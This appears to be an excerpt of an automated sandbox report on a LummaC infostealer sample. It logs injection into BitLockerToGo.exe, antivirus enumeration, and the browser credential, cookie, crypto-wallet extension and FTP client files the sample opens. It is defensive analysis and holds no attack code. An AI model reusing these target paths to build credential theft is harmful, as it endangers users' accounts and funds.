Source: C:\Users\user\Desktop\External2.4.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: DBA008	Jump to behavior
Source: C:\Users\user\Desktop\External2.4.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\External2.4.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\External2.4.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 43F000	Jump to behavior
Source: C:\Users\user\Desktop\External2.4.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 442000	Jump to behavior
Source: C:\Users\user\Desktop\External2.4.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 452000	Jump to behavior
Source: C:\Users\user\Desktop\External2.4.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 453000	Jump to behavior

Source: C:\Users\user\Desktop\External2.4.exe

Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

Jump to behavior

Source: C:\Users\user\Desktop\External2.4.exe	Queries volume information: C:\Users\user\Desktop\External2.4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\External2.4.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\External2.4.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: BitLockerToGo.exe, 00000004.00000003.2100856072.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2100723310.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2100761942.0000000003132000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 7120, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: BitLockerToGo.exe, 00000004.00000003.2100893821.0000000003144000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: BitLockerToGo.exe, 00000004.00000003.2100761942.0000000003191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: BitLockerToGo.exe, 00000004.00000003.2100893821.0000000003144000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: BitLockerToGo.exe, 00000004.00000003.2100761942.0000000003191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: BitLockerToGo.exe, 00000004.00000003.2100761942.0000000003191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: BitLockerToGo.exe, 00000004.00000003.2156907192.000000000319B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3le
Source: BitLockerToGo.exe, 00000004.00000003.2100893821.0000000003144000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: BitLockerToGo.exe, 00000004.00000003.2079108699.00000000031A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: BitLockerToGo.exe, 00000004.00000003.2079436709.00000000031A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
